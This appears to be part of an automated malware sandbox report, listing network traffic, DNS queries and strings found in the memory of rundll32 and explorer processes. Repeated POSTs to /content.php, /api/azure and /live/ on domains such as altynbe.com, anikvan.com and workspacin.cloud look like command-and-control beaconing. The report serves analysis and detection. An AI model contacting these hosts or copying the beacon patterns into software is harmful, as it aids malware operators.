                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: altynbe.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /content.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 248Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: anikvan.comContent-Length: 154Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /live/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: workspacin.cloudContent-Length: 180Cache-Control: no-cache
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Windows\explorer.exeCode function: 22_2_013A4004 InternetReadFile,
                      Source: global trafficDNS traffic detected: DNS query: boriz400.com
                      Source: global trafficDNS traffic detected: DNS query: altynbe.com
                      Source: global trafficDNS traffic detected: DNS query: ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: anikvan.com
                      Source: global trafficDNS traffic detected: DNS query: uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io
                      Source: global trafficDNS traffic detected: DNS query: workspacin.cloud
                      Source: unknownHTTP traffic detected: POST /api/azure HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36Host: boriz400.comContent-Length: 538Connection: Keep-AliveCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:29 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:04:54 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:03 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 May 2024 22:05:21 GMTContent-Type: text/plain; charset=utf-8Content-Length: 9Connection: closeStrict-Transport-Security: max-age=15724800; includeSubDomains
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1847916203.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net
                      Source: explorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
                      Source: explorer.exe, 00000016.00000000.1846357884.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
                      Source: rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/
                      Source: rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/5~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/=~
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/B_F
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/U~
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/X
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azureontent.phpMfE
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azurep
                      Source: rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/api/azureure
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/content.php
                      Source: rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/content.php2f
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/d
                      Source: rundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/ic
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://altynbe.com/tyk.io
                      Source: explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/
                      Source: rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/I~
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azure
                      Source: rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azure==
                      Source: rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/api/azuret.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.php
                      Source: rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.php.f
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/content.phpGf
                      Source: rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/d
                      Source: rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/db-53011b87bd06
                      Source: rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://anikvan.com/ic
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
                      Source: explorer.exe, 00000016.00000000.1845325737.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2938934418.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2937197092.0000000001248000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1844548016.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
                      Source: explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000016.00000000.1847916203.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
